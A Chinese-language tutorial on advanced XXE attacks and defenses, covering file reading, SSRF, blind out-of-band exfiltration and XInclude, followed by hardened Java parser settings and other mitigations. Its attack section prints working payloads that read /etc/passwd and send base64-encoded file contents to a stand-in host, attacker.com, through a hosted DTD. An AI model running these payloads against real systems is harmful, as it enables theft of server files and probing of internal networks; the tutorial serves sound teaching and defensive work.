XXE（XML外部实体注入）漏洞进阶与防护

1. 漏洞描述
XXE（XML External Entity Injection）是一种利用XML解析器处理外部实体的安全漏洞。攻击者通过构造恶意XML数据，可导致敏感文件读取、内网探测、拒绝服务攻击，甚至在特定条件下执行远程代码。进阶篇重点探讨复杂场景下的利用技巧与深层防护策略。

2. 漏洞原理深入

• 外部实体扩展机制：XML标准允许通过<!ENTITY>声明引用外部资源，例如：

  <!ENTITY external SYSTEM "file:///etc/passwd">
  

  解析器若未禁用外部实体，会将该实体替换为实际文件内容。
• 攻击面扩展：
  • SSRF组合利用：通过http://协议读取内网资源，如<!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">。
  • 盲注XXE：无回显时，通过外带数据（OOB）将结果发送到攻击者服务器，需结合参数实体：

    <!ENTITY % payload SYSTEM "file:///secret.txt">
    <!ENTITY % oob "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%payload;'>">
    

  • XInclude攻击：当数据嵌入XML片段时，利用xi:include标签触发解析：

    <xi:include parse="text" href="file:///etc/passwd"/>
    

3. 攻击步骤示例（盲注XXE）
步骤1：定义参数实体加载外部DTD
攻击者托管恶意DTD文件（http://attacker.com/malicious.dtd）：

<!ENTITY % exfil SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % trigger "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%exfil;'>">
%trigger;

步骤2：发送恶意XML请求

<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
%dtd;
]>
<foo>&send;</foo>

解析器会执行DTD中的指令，将Base64编码的文件内容外带到攻击者服务器。

4. 进阶防护方案

• 严格禁用外部实体：

  // Java示例
  DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
  dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
  dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
  dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  

• 使用安全解析器：如Python的defusedxml库，默认禁用危险功能。
• 输入过滤：对用户输入的XML进行关键词检查（如<!ENTITY、SYSTEM），但此法可能被编码绕过。
• 白名单验证：对XML结构进行模式校验（如XSD），拒绝包含外部实体的请求。
• 网络层隔离：限制XML解析器的出站连接，防止OOB数据外泄。

5. 实际场景考量

• SOAP/REST API：若服务需处理XML，需确保所有端点均配置安全解析策略。
• 文件格式混淆：如PPTX、DOCX文件本质为ZIP打包的XML，解析时需同样防护。
• 日志监控：检测异常XML请求（如频繁尝试读取系统文件）。

通过结合代码层防护与基础设施限制，可有效防御进阶XXE攻击。